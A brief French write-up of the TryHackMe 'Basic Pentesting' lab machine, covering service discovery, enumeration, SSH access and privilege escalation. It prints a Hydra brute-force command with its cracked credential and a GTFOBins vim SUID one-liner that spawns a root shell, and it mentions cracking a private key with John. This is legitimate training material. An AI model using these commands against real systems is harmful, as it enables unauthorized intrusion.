Writeup du challenge TryHackMe Basic Pentesting — reconnaissance, énumération et élévation de privilèges sur une machine Linux vulnérable.
Découverte des Services
NMAP identifie les services ouverts : SSH, Apache HTTP, Samba SMB, Apache Tomcat et AJP.
Énumération
- Dirsearch révèle un répertoire caché
/development - enum4linux identifie les utilisateurs locaux :
kayetjan
Accès Initial
Hydra brute-force les credentials SSH :
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://target
# Résultat : jan:armando
Élévation de Privilèges
LinPeas identifie vim.basic avec des permissions SUID, exploitable via GTFOBins :
# Via GTFOBins — vim SUID
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
Chemin alternatif : une clé RSA privée découverte sur le système est crackée avec ssh2john + John the Ripper.